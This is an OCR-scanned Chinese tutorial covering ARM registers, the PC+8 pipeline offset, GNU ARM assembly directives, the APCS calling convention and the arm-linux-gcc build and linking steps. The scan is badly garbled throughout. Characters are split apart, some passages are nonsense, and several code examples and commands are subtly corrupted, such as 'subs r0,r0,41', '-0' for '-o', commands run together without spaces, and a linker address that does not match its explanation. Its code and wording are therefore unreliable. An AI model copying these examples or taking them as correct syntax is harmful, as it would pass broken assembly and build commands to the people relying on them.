(the stack pointer) 减 去 4。ARM 堆 栈 结构 是 从 高 向 低压 栈 的 ， 因 为 处 理 器 是 32 位 的 ARM ， 

所 以 每 压 一 次 栈 ，SP 就 会 移动 4 个 字 节 (32 位 ) ， 也 就 是 sp = sp-4。 

R14 也 称 为 LR 寄存 器 (linked register)， 当 一 个 子 程序 被 调用 时 ，LR 会 被 填 入 程序 计数 器 
(PC) ; 当 一 个 子 程序 执行 完毕 后 ，PC 从 LR 的 值 恢 复 ， 从 而 返回 (到 主 函 数 中 ) © 

R15 也 成 为 程序 计数 器 (program counter， 它 的 值 是 当前 正在 执行 的 指令 在 内 存 中 的 地 址 ， 

like RIP in x86 64 & EIP in x86) 。 

该 寄存 器 或 保存 目前 正在 执行 的 内 存 地 址 。 PC fe LR 都 是 跟 代 码 有 关 的 寄存 器 ， 一 个 是 

Where you are， 另 外 一 个 是 Where you were 。 


C. 程 序 计 数 器 ，PC 

PC 寄存 器 存储 指令 地 址 ， 由 于 ARM 采 用 流水 机 制 执 行 指 令 ， 故 PC 寄存 器 总 是 存储 下 一 条 指 
令 的 地 址 。 

由 于 ARM 是 按照 字 对 齐 ， 故 PC 被 读 取 后 的 值 的 bit[1:0] 总 是 0b00(thumb 的 bit[0] 是 0b0) » 
2. 程 序 状态 寄存 器 


程序 状态 寄存 器 包含 当前 程序 状态 寄存 器 和 备份 状态 寄存 器 。 


a.CPSR( 程 序 状态 寄存 器 ，Current Program State Register) 
CPSR 在 任何 处 理 器 模式 下 都 可 以 被 访问 。 其 结构 如 下 : 


31 30 29 28 ---7 654 3 2 1 0 
N Z CV--I FT M4 M3 M2M1 MO 


N(Negative)、Z(Zero)、C(Carry) 以 及 V(oVerflow) 称 为 条 件 标志 位 ，ARM 指 令 根据 CPSR 的 条 
件 标 志 位 来 选择 地 执行 


CPSR 条 件 标志 位 


条 件 标 志 位 ”含义 

N=1 表示 运算 结果 为 负数 ，N=0 表示 运算 结果 为 正 数 。 
Z=1 表示 运算 结果 为 0，Z=0 表示 运算 结果 为 非 零 。 
C=1 表示 运算 结果 产生 了 进位 。 
V=1 运算 结果 的 符号 位 发 生 了 溢出 。 


N 
Z 
C 
V 
Q 在 ARMVv5 E 系 列 版 本 中 Q=1 表示 DSP 指 令 溢 出 ， 在 ARMv5 以 前 的 版 本 中 没有 Q 标 志 


—~~ 
< 


o 


以 下 指令 会 影响 CPSR 的 条 件 标志 
(1) 比较 指令 ， 如 : CMP ` CMN ` TEQ 、TST 等 。 

(2) 当 一 些 算术 逻辑 运算 的 目标 寄存 器 不 是 PC 时 ， 这 些 指令 会 影响 CPSR 的 条 件 标志 位 。 
(3) MSR 与 MRS 指 令 可 以 对 CPSR/SPSR 进 行 操作 。 

(4) LDM 指 令 可 以 将 SPSR 复 制 到 CPSR 中 。 


CPSR 的 控制 位 


控制 位 含义 

| “1=1 禁用 IRO 中 断 

F ”F=1 禁用 FIQ 中 断 

T ”ARMv4 以 上 T 版 本 T=0 执行 ARM 指 令 ，T=1 执 行 Thumb 指 令 ，ARMv5 以 上 非 T 版 本 T=0 
执行 ARM 指 令 ，T=1 表 示 下 一 条 指令 产生 未 定义 指令 中 断 。 
M[4:0] 控制 处 理 器 模式 

0b10000 User 

0b10001 FIQ 

0b10010 IRQ 

0b10011 Supervisor 

0b10111 Abort 

0b11011 Undefined 

0b11111 System 


b.SPSR( 各 份 状态 寄存 器 ) 


SPSR 的 结构 与 CPSR 的 结构 相同 ，SPSR 是 用 来 备份 CPSR 的 。 


3. SP ` FP 详解 


SP 和 FP 都 是 跟 本 地 数据 相关 的 寄存 器 。 一 个 是 "Where local data is"， 另 外 一 个 是 "Where 
the last local data is" ° 


Bub (Stack Frame) 就 是 一 个 函数 所 在 的 栈 的 一 部 分 ， 所 有 函数 的 栈 帧 串 起 来 就 组 成 了 一 个 
完整 的 栈 。 

栈 帧 的 两 个 边界 分 别 由 FP 和 SP 来 限定 ， 它 们 2 个 指向 的 是 当前 函数 的 栈 帧 。 

考虑 main 函数 调用 fun1 函 数 的 情形 ， 下 图 是 它们 使 用 栈 。 

观察 func1 的 栈 帧 ， 它 的 SP 和 FP 之 间 指 向 的 栈 帧 就 是 main 函数 的 栈 帧 。 

main 函数 产生 调用 时 ，PC、LR、SP、FP 会 在 第 一 时 间 压 栈 。 


memory: high address 








ner tramo NNI 
main local variable: i=10 
main local variable: j=5 
The 5th parameter for func1: 2 



















func1 stack frame 


memory: low address 


4. PC 与 相对 取 址 


ARM 不 能 像 单片机 那样 ， 想 取 某 个 标签 地 址 ， 就 可 以 mov r1,# 标 签 。 

因为 ARM 立 即 数 寻 址 有 限制 ， 最 大 是 4096， 再 大 就 只 能 相对 寻 址 ， 显 然 所 有 的 指针 都 会 超过 
限制 ， 只 能 间接 寻 址 ， 所 以 需要 用 另 一 种 方式 直接 算出 寻 址 位 置 的 地 址 和 全 局 变量 位 置 的 相 
对 地 址 。 

ARM7 和 ARM9 都 是 3 级 流水 线 ， 取 指 ， 译 指 ， 执 行 时 同时 执行 的 : 


1. Fetch (从 存储 器 装载 一 条 指令 ) 


2. Decode (识别 将 要 被 执行 的 指令 ) 
3. Execute (处 理 指令 并 将 结果 写 回 寄存 器 ) 


而 R15 (PC) 总 是 指向 “正在 取 指 "指令 ， 而 不 是 指向 “正在 执行 "的 指令 或 正在 “ 译 码 " 的 指令 ， 
那么 CPU 正在 译 指 的 指令 地 址 是 PC-4 ( 当 ARM 状 态 时 ， 每 条 指令 为 4 字 节 ) ，CPU 正 在 执行 
的 指令 地 址 是 PC-8， 也 就 是 说 PC 所 指向 的 地 址 和 现在 所 执行 的 指令 地 址 相差 8， 即 : PC 实际 
值 = 当前 程序 执行 位 置 +8。 

— 指令 周期 1 | 指令 周期 2 ， 指令 周期 3 . 
取 第 一 个 指令 , | 取 第 二 个 指令 ，! 取 第 三 个 指令 , 同 


1 
同时 PC=PC+41 同 时 PC=PC+8| 时 PC=PC+12 
sanasana 只 





cas aab die die ie i 


[ WAUS ABS, 
i ”I 此 时 ， 如果 计 算 
I ! 中 用 到 了 PC , BB 
1 “| 么 此 刻 PC 的 值 , 
1 “已 经 是 当前 本 条 
1! “| 正在 指令 的 地 址 ， 
“thn 上 8 了 , Bo 

—Á ae OL _. 


ARM9 的 五 级 流水 线 中 


为 何 PC=PC+8 





PC (execute) =PC (fetch) +8 

对 于 PC=PC+8 中 的 两 个 PC， 其 实 含义 不 完全 一 样 。 其 更 准确 的 表达 ， 应 该 是 这 样 : 
其 中 : 

PC (fetch) : 当前 正在 执行 的 指令 ， 就 是 之 前 取 该 指令 时 候 的 PC 的 值 。 

PC (execute) : 当前 指令 执行 的 计算 中 ， 如 果 用 到 PC， 则 此 时 PC 的 值 。 

不 同 阶段 的 PC 值 的 关系 

对 应 地 ， 在 ARM7 的 三 级 流水 线 〈 取 指 ， 译 指 ， 执 行 ) 和 ARM9 的 五 级 流水 线 ( 取 指 ， 译 指 ， 
执行 ， 存 储 ， 写 回 ) 中 ， 可 以 这 么 说 : 

PC， 总 是 指向 当前 正在 被 取 指 的 指令 的 地 址 ， 

PC-4， 总 是 指向 当前 正在 被 译 指 的 指令 的 地 址 ， 

PC-8， 总 是 指向 当前 的 那 条 指令 ， 即 我 们 一 般 说 的 ， 正 在 被 执行 的 指令 的 地 址 。 


其 他 细节 具体 可 参考 3.4. 为 何 ARM7 中 PC=PC+8 


Reference 
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第 一 部 分 Linux 下 ARM 汇 编 语 法 


尽管 在 Linux 下 使 用 C 或 C++ 编写 程序 很 方便 ， 但 汇编 源 程序 用 于 系统 最 基本 的 初始 化 ， 如 初 
始 化 堆栈 指针 、 设 置 页 表 、 操 作 ARM 的 协 处 理 器 等 ， 初 始 化 完成 后 就 可 以 跳 转 到 C 代 码 执 
行 。 需 要 注意 的 是 ，GNU 的 汇编 器 遵循 AT&T 的 汇编 语法 ， 指 令 一 般 用 小 写字 母 ， 可 以 从 GNU 
的 站 点 (www.gnu.org ) 上 下 载 有 关 规 范 。 

(汇编 ) 指令 是 CPU 机 器 指令 的 助 记 符 ， 经 过 编译 后 会 得 到 一 串 10 组 成 的 机 器 码 ， 可 以 由 
CPU 读 取 执行 。 

(汇编 ) 伪 指 令 本 质 上 不 是 指令 (只 是 和 指令 一 起 写 在 代码 中 ) ， 它 是 编译 器 环境 提供 的 ， 
目的 是 用 来 指导 编译 过 程 ， 经 过 编译 后 伪 指 令 最 终 不 会 生成 机 器 码 。 


一 .Linux 汇 编 行 结构 


任何 汇编 行 都 是 如 下 结构 : 

E] D @ comment 

[10 Q 注释 

Linux ARM 汇编 中 ， 任 何以 冒号 结尾 的 标识 符 都 被 认为 是 一 个 标号 ， 而 不 一 定 非 要 在 一 行 的 
开始 。 

【 例 1】 定 义 一 个 "add" 的 函数 ， 返 回 两 个 参数 的 和 o 


.section .text, "x" 

.global add Q give the symbol add external linkage 
add: 

ADD rO, rO, ri Q add input arguments 

MOV pc, lr @ return from subroutine 

Q end of program 


—. Linux 汇编 程序 中 的 标号 


ar 


示 号 只 能 由 am~-Z，A~-Z，0~9，"."， 等 字符 组 成 。 当 标号 为 0~-9 的 数字 时 为 局 部 标号 ， 局 
部 标号 可 以 重复 出 现 ， 使 用 方法 如 下 : 

标号 在 引用 的 地 方向 前 的 标号 

标号 b: 在 引用 的 地 方向 后 的 标号 

【 例 2】 使 用 局 部 符号 的 例子 ， 一 段 循环 程序 


了 
subs r0,r0,41 @ 每 次 循环 使 r9=rg9-1 
bne 1f @ 跳 转 到 1 标号 去 执行 


局 部 标号 代表 它 所 在 的 地 址 ， 因 此 也 可 以 当 作 变量 或 者 函数 来 使 用 。 


=, Linux 汇编 程序 中 的 分 段 


(1) .section 伪 操作 
用 户 可 以 通过 .section 伪 操作 来 自 定义 一 个 段 ， 格 式 如 下 : 


.section section name [, "flags"[, 9étype[,flag specific arguments]]] 每 一 个 段 以 段 名 为 开 
始 ， 以 下 一 个 段 名 或 者 文件 结尾 为 结束 。 这 些 段 都 有 缺 省 的 标志 (flags)， 连 接 器 可 以 识别 这 些 


标志 。( 与 armasm 中 的 AREA 相 同 ) 。 
type 可 以 是 @progbits( 节 中 包含 数据 )，@nobits( 节 中 不 含 数据 ， 只 是 占 位 
中 包含 注释 信息 ， 不 是 程序 ) 。 
下 面 是 ELF 格 式 允 许 的 段 标志 
< 标志 > 含义 
a 允许 段 
W 可 写 段 
x 执行 段 
【 例 3】 定 义 段 


.Section .mysection @ 自 定义 数据 段 ， 段 名 为 ".mysection" 
.align 2 

strtemp: 

.ascii "Temp string /n/0" 


(2) 汇编 系统 预定 义 的 段 名 
text @ 代 码 段 
data @ 初 始 化 数据 段 
.bss @ 未 初始 化 数据 段 
.sdata @ 
.Sbss @ 
需要 注意 的 是 ， 源 程序 中 .bss 段 应 该 在 .text 之 前 。 


四 . 定义 入 口 点 


立 空间 )，@note( 节 


汇编 程序 的 缺 省 入 口 是 start 标 号 ， 用 户 也 可 以 在 连接 脚本 文件 中 用 ENTRY 标 志 指 明 其 它 入 口 


点 。 
【 例 4】 定 义 入 口 点 


.Section.data 

< initialized data here> 
.Section .bss 

< uninitialized data here> 
.Section .text 

.globl start 

_start: 

<instruction code goes here> 


五 . Linux 汇 编程 序 中 的 宏 定义 
格式 如 下 : 


.macro 宏 名 参数 名 列表 @ 伪 指令 ,macro 定 义 一 个 宏 
宏 体 
.endm @.endm 表 示 宏 结束 


如 果 宏 使 用 参数 ， 那 么 在 宏 体 中 使 用 该 参数 时 添加 前 缓 "/"， 宏 定义 时 的 参数 还 可 以 使 用 默认 
值 ， 可 以 使 用 .exitm 伪 指令 来 退出 宏 © 
[515] Z x3 
.macro SHIFTLEFT a, b 
.if /b « 0 
MOV /a, /a, ASR #-/b 
.exitm 
.endif 


MOV /a, /a, LSL #/b 
.endm 


六 .Linux 汇 编程 序 中 的 常数 


(1) 十 进 制 数 以 非 0 数 字 开 头 ， 如 : 123 和 9876 ; 

(2) 二 进 制 数 以 0b 开 头 ， 其 中 字母 也 可 以 为 大 写 ; 

(3) 八进制 数 以 0 开始 ， 如 : 0456,0123 ; 

(4) 十 六 进 制 数 以 0x 开 头 ， 如 : Oxabcd,0X123f ; 

(5) 字符 串 常 量 需 要 用 引号 括 起 来 ， 中 间 也 可 以 使 用 转 义 字符 ， 如 : "You are welcomel/n"; 
(6) 当前 地 址 以 "." 表 示 ， 在 汇编 程序 中 可 以 使 用 这 个 符号 代表 当前 指令 的 地 址 ; 

(7) 表达 式 : 在 汇编 程序 中 的 表达 式 可 以 使 用 常数 或 者 数值 ，"-" 表 示 取 负数 ，"~" 表 示 取 
补 ，"<>" 表 示 不 相等 ， 其 他 的 符号 如 r+ >->*s [Mr <> << >> >>>] s&s] > ==> 
>=> <=> && > || 跟 C 语 言 中 的 用 法 相似 。 


+. Linux 下 ARM 江 编 的 常用 伪 操 作 


在 前 面 已 经 提 到 过 了 一 些 伪 操作 ， 还 有 下 面 一 些 伪 操作 : 

数据 定义 伪 操 作 : byte > .short > .long > .quad ° .float > .string/.asciz/.ascii ; 
重复 定义 伪 操 作 .rept ; 

赋值 语句 .equl.set ; 

函数 的 定义 ; 

对 齐 方式 伪 操 作 align ; 

源 文件 结束 伪 操 作 .end ; 

include 伪 操 作 ; 

if 伪 操 作 ; 


.global/ .globl 伪 操 作 ; 

.type 伪 操作 ; 

列表 控制 语句 ， 

.abort 停止 汇编 ; 

区 别 于 gas 汇 编 的 通用 伪 操 作 ， 下 面 是 ARM 特 有 的 伪 操 作 : .reg ，.unreq > .code > thumb 
> .thumb func > .thumb set* .ltorg > .pool 


1. 数据 定义 伪 操 作 
(1) .byte : 单字 节 定 义 ， 如 ; byte 1,2,0b01,0x34,072,'s' 3 
(2) .short : 定义 双 字 节 数 据 ， 如 : short 0x1234,60000 ; 
(3) long: 定义 4 字 节 数据 ， 如 : long 0x12345678, 23876565 ; 
(4) .quad : 定义 8 字 节 ， 如 : .quad 0x1234567890abcd ; 


(5) .float : 定义 浮 点 数 ， 如 : 
.float 0f-314159265358979323846264338327/95028841971.693993751E-40 @ -pi 


(6) .string/.asciz/.ascii : 定义 多 个 字符 串 ， 如 : 


.string "abcd", "efgh", "hello!" 
.asciz "qwer", "sun", "world!" 
.ascii "welcome/0" 


需要 注意 的 是 : .ascii 伪 操作 定义 的 字符 串 需要 自行 添加 结尾 字符 /0' 。 
(7) rept: 重复 定义 伪 操 作 ， 格 式 如 下 : 

.rept 重复 次 数 

数据 定义 

.endr @ 结 束 重 复 定 义 

例如 : 


.rept 3 
.byte 0x23 
.endr 


(8) .equ/.set : 赋值 语句 , 格式 如 下 : 
.equ(.set) 变量 名 ,表达 式 
例如 : 

.equ abc, 3 Qitabc-3 
(9) .comm symbol, length : 在 bss 段 申请 一 段 命名 空间 ， 该 段 空间 的 名 称 ™ symbol, 长 度 
为 length，Ld 连 接 器 在 连接 会 为 它 留 出 空间 。 
(10) .previous : 将 当前 节 换 回 到 前 一 个 节 与 子 节 ， 即 将 下 面 的 指令 或 数据 汇编 到 当前 
节 之 前 使 用 的 节 与 子 节 中 。 

(11) .subsection num : 切换 当前 子 节 ， 即 将 下 面 的 代码 或 数据 放 在 由 num 指 定 的 子 节 
中 ， 节 保持 不 变 。 

(12) .fill repeat,size,value : 将 value 值 拷贝 repeat 次 ， 其 中 每 个 value 中 占用 size 字 


ET 


P o 


(13)space 和 skip 

.space size,fill 和 ,skip size,fill : 在 目标 文件 的 当前 位 置 处 留 出 size 字 节 的 空 
lal » JE YALA ARF > de ARR Lill > WAL AO © 
(14) .org new-1c, fill : 从 new-lc 标 识 的 新 位 置 开始 存放 下 边 的 代码 或 数据 ， 之 前 空 
K È AAPEA ° 
(15) .extern symbol : 从 其 它 模块 引入 符号 ， 类 似 C 中 的 extern 。 


.函数 的 定义 伪 操 作 

(1) 函数 的 定义 ,格式 如 下 : 

ES: 

SECUS 

返回 语句 

一 般 的 ， 遂 数 如 果 需 要 在 其 他 文件 中 调用 ， 需 要 用 到 .global 伪 操 作 将 函数 声明 为 全 局 函 
数 。 为 了 不 至 于 在 其 他 程序 在 调用 某 个 C 函 数 时 发 生 混 乱 ， 对 寄存 器 的 使 用 我 们 需要 遵循 
APCS | > BR ES MEAE BRAGA —K.global4yil Ao (2) 函数 的 编写 应 
当 遵 循 如 下 规则 : 


. a1-a4 寄 存 器 (参数 、 结 果 或 暂 存 寄存 器 ，r0 到 r3 的 同 义 字 ) 以 及 浮 点 寄存 器 f0-f3( 如 果 
存在 浮 点 协 处 理 器 ) 在 函数 中 是 不 必 保 存 的 ; 
.如果 函数 返回 一 个 不 大 于 一 个 字 大 小 的 值 ， 则 在 函数 结束 时 应 该 把 这 个 值 送 到 OT: 


5 如果 函 数 返回 一 个 浮 点 数 ， 则 在 函数 结束 时 把 它 放 入 浮 点 寄存 器 fO 中 ; 


， 如 果 函 数 的 过 程 改动 了 sp (堆栈 指针 ，r13) > fp (框架 指针 ，r11) 、sl (堆栈 限制 ， 
r10) 、Ir (连接 寄存 器 ，r14) ^ v1-v8 (变量 寄存 器 ，rM4 到 r11) F (447° PA HRS 
束 时 这 些 寄存 器 应 当 被 恢复 为 包含 在 进入 函数 时 它 所 持 有 的 值 。 


.align .end .include .incbin 伪 操 作 
(1) .align: 用 来 指定 数据 的 对 齐 方式 ， 格 式 如 下 : 


.align [absexpri, absexpr2] 

以 某 种 对 齐 方式 ， 在 未 使 用 的 存储 区 域 填 充值 。 第 一 个 值 表示 对 齐 方式 : 4,8,16 或 32， 
第 二 个 表达 式 值 表示 填充 的 值 。 

(2) .end : 表明 源 文件 的 结 

(3) .include : 可 以 将 指定 的 文件 在 使 用 .include 的 地 方 展开 ， 一 般 是 头 文 件 ， 例 如 


.include "myarmasm.h" 

(4) .incbin 伪 操 作 可 以 将 原封 不 动 的 一 个 二 进 制 文件 编译 到 当前 文件 中 ， 使 用 方法 如 
.incbin "file"[,skip[,count]] Skip 表 明 是 从 文件 开始 跳 过 skip 个 字 节 开始 读 取 文件 ， 
count 是 读 取 的 字数 。 


if AAR 

根据 一 个 表达 式 的 值 来 决定 是 否 要 编译 下 面 的 代码 ， 用 .endif 伪 操作 来 表示 条 件 判 断 的 结 
R? RUE else 来 决定 .if 的 条 件 不 满足 的 情况 下 应 该 编译 哪 一 部 分 代码 。 

iff % 多 Ad 


.ifdef symbol @ 判 断 Symbol1 是 否定 义 

.ifc stringi,string2 @ 字 符 串 string1 和 string2 是 否 相等 ， 字 符 串 可 以 用 单 引 号 括 起 来 
.ifeq expression @7] ®fexpression## fix GAO 

.ifegs stringi,string2 @ 判 断 string1 和 string2 是 否 相 等 ， 字 符 串 必须 用 双 引 号 括 起 来 
.ifge expression @ 判 断 expression 的 值 是 否 大 于 等 于 0 

.ifgt absolute expression @ 判 断 expression 的 值 是 否 大 于 0 

.ifle expression @ 判 断 expression 的 值 是 否 小 于 等 于 0 

.iflt absolute expression @ 判 断 expression 的 值 是 否 小 于 0 

.ifnc stringi,string2 @ 判 断 string1 和 string2 是 否 不 相等 ， 其 用 法 跟 .Ifc 恰 好 相反 。 
.ifndef symbol, .ifnotdef symbol @ 判 断 是 否 没 有 定义 Symbo1， 跟 .ifdef 恰 好 相反 
.ifne expression @ 如 果 expression 的 值 不 是 9， 那么 编译 器 将 编译 下 面 的 代码 

.ifnes stringi,string2 @ 如 果 字 符 串 string1 和 string2 不 相等 ， 那 么 编译 器 将 编译 下 面 的 代码 ， 


9. .global .type :title .list 
(1) .global .globl : 用 来 定义 一 个 全 局 的 符号 ， 格 式 如 下 : 
.global symbol 或 者 .globl symbol 
(2) type : 用 来 指定 一 个 符号 的 类 型 是 函数 类 型 或 者 是 对 象 类 型 ， 对 象 类 型 一 般 是 数 
据 ， 格 式 如 下 : 
type 符号 ， 类 型 描述 


= 


a 


[ #16) 

.globl a 

.data 

.align 4 

.type a, Qobject 
.size a, 4 

a: 

.long 10 
[47] 


.section .text 

.type asmfunc, Qfunction 
.globl asmfunc 

asmfunc: 

mov pc, lr 


(3) 列表 控制 语句 : 
title : 用 来 指定 汇编 列表 的 标题 ， 例 如 : 


.title "my program" 
list : 用 来 输出 列表 文件 。 
10. ARM 特有 的 伪 操 作 
(1) reg: 用 来 给 寄存 器 赋予 别名 ， 格 式 如 下 : 
别名 .req 寄存 器 名 
(2) .unreq: 用 来 取消 一 个 寄存 器 的 别名 ， 格 式 如 下 : 
.Unreq 寄存 器 别名 
注意 被 取消 的 别名 必须 事先 定义 过 ， 否 则 编译 器 就 会 报错 ， 这 个 伪 操 作 也 可 以 用 来 取 
消 系统 预制 的 别名 ， 例 如 r0， 但 如 果 没 有 必要 的 话 不 推荐 那样 做 。 
(3) .code 伪 操作 用 来 选择 ARM 或 者 Thumb 指 令 集 ， 格 式 如 下 : 
code 表达 式 


大 大 


如 果 表 达 式 的 值 为 16 则 表明 下 面 的 指令 为 Thumb 指 令 ， 如 果 表 达 式 的 值 为 32 则 表明 

下 面 的 指令 为 ARM 指 令 。 

(4) thumb 伪 操 作 等 同 于 .code 16， 表 明 使 用 Thumb 指 令 ， 类 似 的 .arm 等 同 于 .code 
32 

(5) .force thumb 伪 操 作用 来 强制 目标 处 理 器 选择 thumb 的 指令 集 而 不 管 处 理 器 是 否 支 
持 

(6) .thumb func 伪 操 作用 来 指明 一 个 函数 是 thumb 指 令 集 的 函数 

(7) .thumb_set 伪 操 作 的 作用 类 似 于 .set， 可 以 用 来 给 一 个 标志 起 一 个 别名 ， 比 .set 功 
能 增加 的 一 点 是 可 以 把 一 个 标志 标记 为 thumb 函数 的 入 口 ， 这 点 功能 等 同 于 
.thumb_func 

(8) .ltorg 用 于 声明 一 个 数据 缓冲 池 (literal pool) 的 开始 ， 它 可 以 分 配 很 大 的 空间 。 

(9) .pool 的 作用 等 同 .ltorg 

(9) .space {,} 
分 配 number_of bytes 字 节 的 数据 空间 ， 并 填充 其 值 为 fl_byte， 若 未 指定 该 值 ， 缺 省 填 
充 0。 (与 armasm 中 的 SPACE 功 能 相同 ) 

(10) .word { ... 
插入 一 个 32-bit 的 数据 队列 。 (与 armasm 中 的 DCD 功 能 相同 ) 
可 以 使 用 .word 把 标识 符 作 为 常量 使 用 
例如 : 


Start: 
valueOfStart: 
.Word Start 


这 样 程序 的 开头 Start 便 被 存 入 了 内 存 变 量 valueOfStart 中 。 
(11) .hword {} ... 
插入 一 个 16-bit 的 数据 队列 。 (与 armasm 中 的 DCW 相 同 ) 


^, GNU ARM 江 编 特 殊 字 符 和 语法 


代码 行 中 的 注释 符号 : '@ 
整 行 注释 符号 : 听 
BOP 843: 
直接 操作 数 前 级 : H 或 '$ 


第 二 部 分 GNU 的 编译 器 和 调试 工具 


一 .APCS 规 则 


APCS(ARM Process Call Standard) 也 就 是 指 过 程 调用 规则 ， 定 义 了 一 系列 规则 来 保证 ARM 
汇编 语言 和 C 程 序 之 间 能 够 协调 工作 。 涉 及 到 的 函数 参数 传递 问题 ， RAPHE 3 VAR o HAW 


用 过 


1. 


2. 


3. 


4. 


— 


— 
" 


1. 


程 中 的 寄存 器 的 使 用 ， 堆 栈 的 使 用 等 问题 。 


寄存 器 使 用 APCS 中 ，R0-R3 用 来 传递 参数 ， 传 递 参数 给 子 程序 和 返回 子 程序 结果 ; R4- 
R11 保 存 函 数 的 局 部 变量 (Thumb 指 令 集 只 能 使 用 R4-R7) ，R12 (IP) 也 能 被 用 在 子 程 
序 间 传 递 立即 数 (ARMAR S T) 3 

R13(SP) 用 来 做 堆栈 指针 ， 保 存 当 前 处 理 器 模式 的 栈 顶 指针 ， 链 接 寄存 器 R14 (LR) 保 
存 子 程序 的 返回 过 程 。 

参数 传递 规则 

当 参 数 个 数 不 超过 4 个 时 ， 可 用 上 述 的 4 个 寄存 器 来 传递 ， 否 则 超过 的 参数 使 用 栈 来 传 
递 ， 对 于 子 程序 的 返回 结果 ， 可 用 RO-R3 来 传递 。 
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若 返 回 值 是 32 位 的 整数 时 ， 一 般 通 过 寄存 器 RO 来 传递 ， 如 果 是 64 位 的 整数 时 ， 用 R0 和 
R1 来 传递 。 

arm-linux-gcc 编 译 器 

1>. 预 处 理 : 将 预 处 理 输入 文件 后 组 名 为 ".c",".S"， 输 出 为 "."， 工 具 : arm-linux-cpp 
arm-linux-gcc -E -o *.i *.c/*.S 

2». 1E : 完成 源 代码 从 高 级 语言 到 特定 的 汇编 语言 代码 的 转换 工具 : cel 

arm-linux-gcc -S -0 *.s *c 

3>. 汇 编 : 将 编译 得 到 的 ".s" 文 件 按照 一 定 的 指令 集 转换 成 一 定格 式 的 机 器 码 工 具 : arm- 
linux-as 

arm-linux-gcc -c -o *.o *.c/*s/*.S 

4>. 链 接 : 将 汇编 生成 的 目标 文件 和 系统 库 的 目标 文件 ， 库 文件 组 装 起 来 ， 生 成 在 特定 处 
理 器 平台 运行 的 可 执行 文件 ， 工 具 : arm-linux-Id 

arm-linux-gcc -0 *.c/*s/*S 


除了 上 面 的 -E -S> -c, -0810F > 3678 -v,-g,-Wall,-Ox, (x=1,2,3...) 等 选项 


编译 工具 


编辑 工具 介绍 GNU 提供 的 编译 工具 包括 汇编 器 as、C 编 译 器 gcc、C++ 编 译 器 g++、 连 接 
器 ld 和 二 进 制 转 换 工 具 objcopy。 基 于 ARM 平 台 的 工具 分 别 为 arm-linux-as、arm-linux- 
gcc ` arm-linux-g++ ` arm-linux-Idfe arm-linux-objcopy ° 
GNU 的 编译 器 功能 非常 强大 ， 共 有 上 百 个 操作 选项 ， 这 也 是 这 类 工具 让 初学 者 头痛 的 原 
o 不 过 ， 实 际 开发 中 只 需要 用 到 有 限 的 几 个 ， 大 部 分 可 以 采用 缺 省 选项 。GNU 工 具 的 
开发 流程 如 下 : 编写 C、C++ 语 言 或 汇编 源 程序 ， 用 gcc 或 g++ 生成 目标 文件 ， 编 写 连 接 脚 
本 文件 ， 用 连接 器 生成 最 终 目 标 文件 (elf 格式 ) ， 用 二 进 制 转换 工具 生成 可 下 载 的 二 进 
制 代码 。 

(1) 编写 C、C++ 语 言 或 汇编 源 程序 
通常 汇编 源 程序 用 于 系统 最 基本 的 初始 化 ， 如 初始 化 堆栈 指针 、 设 置 页 表 、 操 作 ARM 的 


协 处 理 器 等 。 初 始 化 完成 后 就 可 以 跳 转 到 C 代 码 执行 。 需 要 注意 的 是 ，GNU 的 汇编 器 遵 
循 AT&T 的 汇编 语法 ， 读 者 可 以 从 GNU 的 站 点 (www.gnu.org ) 上 下 载 有 关 规 范 。 汇 编程 
序 的 缺 省 入 口 是 start 标 号 ， 用 户 也 可 以 在 连接 脚本 文件 中 用 ENTRY 标 志 指 明 其 它 入 口 点 
( 见 下 文 关 于 连接 脚本 的 说 明 ) 。 

(2) 用 gcc 或 g++ 生成 目标 文件 

如 果 应 用 程序 包括 多 个 文件 ， 就 需要 进行 分 别 编译 ， 最 后 用 连接 器 连接 起 来 。 如 笔者 的 
引导 程序 包括 3 个 文件 : init.s (汇编 代码 、 初 始 化 硬件 ) xmrecever.c (通信 模块 ， 采 用 
A 和 flash.c (Flash 擦 写 模 块 ) 。 

个 别 用 如 下 命令 生成 目标 文件 : 


arm-linux-gcc-c-02-oinit.oinit.s 
arm-linux-gcc-c-02-oxmrecever.oxmrecever.c 
arm-linux-gcc-c-02-oflash.oflash.c 


其 中 -c 命令 表示 只 生成 目标 代码 ， 不 进行 连接 ; -0 命令 指明 目标 文件 的 名 称 ; -O2 表 示 
采用 二 级 优化 ， 采 用 优化 后 可 使 生成 的 代码 更 短 ， 运 行 速度 更 快 。 如 果 项 目 包 含 很 多 文 
件 ， 则 需要 编写 makefile 文 件 。 关 于 makefile 的 oe , a IEA. XU 
(3) 编写 连接 脚本 文件 
gcc pote 内 置 有 缺 省 的 连接 脚本 。 如 果 采 用 缺 省 脚本 ， 则 生成 的 目标 代码 需要 操作 系 
统 才 能 加 载运 行 。 为 了 能 在 识 入 式 系统 上 直接 运行 ， 需 要 编写 自己 的 连接 脚本 文件 。 编 
写 Pc 首先 要 对 目标 文件 的 格式 有 一 定 了 解 。 
GNU 编 译 器 生成 的 目标 文件 缺 省 为 elf 格 式 。elf 文 件 由 若干 段 (section) 组 成 ， 如 不 特殊 
着 明 ， 由 C 源 程序 生成 的 目标 代码 中 包 Hen text (正文 段 ) 包含 程序 的 指令 代 
码 ; .data( 数 据 段 ) 包 含 固定 的 数据 ， 如 常量 、 字 符 串 ; bss (未 初始 化 数据 段 ) 包含 未 初 
始 化 的 变量 、 数 组 等 。 
C++ 源 程序 生成 的 目标 代码 中 还 包括 .fini ( 析 构 函数 代码 ) 和 init (构造 函数 代码 ) 等 。 
连接 Aes uM 个 目标 文件 的 .text、.data 和 .bss 等 段 连 接 在 一 起 ， 而 连接 脚本 文 
件 是 告诉 连接 器 从 什么 地 址 开始 放置 这 些 段 。 
例如 a ; 


ENTRY (begin) 
SECTION 


{ 
.=0x30000000; 


text: {*(. text) } 
.data: {*(.data)} 
.bss:{*(.bss)} 


其 中 ，ENTRY(begin) 指 明 程 序 的 入 口 点 为 begin 标 号 ; .=0x00300000 指明 目标 代码 的 起 
始 地 址 为 0x30000000， 这 一 段 地 址 为 MX1 的 片 内 RAM ; .text:{*(.text)} 表示 从 
0x30000000 开始 放置 所 有 目标 文件 的 代码 段 ， 随 后 的 .data:{* (.data)) 表示 数据 段 从 
代码 段 的 末尾 开始 ， 再 后 是 .bss 段 。 

(4) 用 连接 器 生成 最 终 目 标 文件 
有 了 连接 脚本 文件 ， 如 下 命令 可 生成 最 终 的 目标 文件 : 


arm-linux-ld -no stadlib -o bootstrap.elf -Tlink.lds init.o xmrecever.o flash.o 


其 中 ，ostadlib 表 示 不 连接 系统 的 运行 库 ， 而 是 直接 从 begin 入 口 ; -0 指明 目标 文件 的 名 


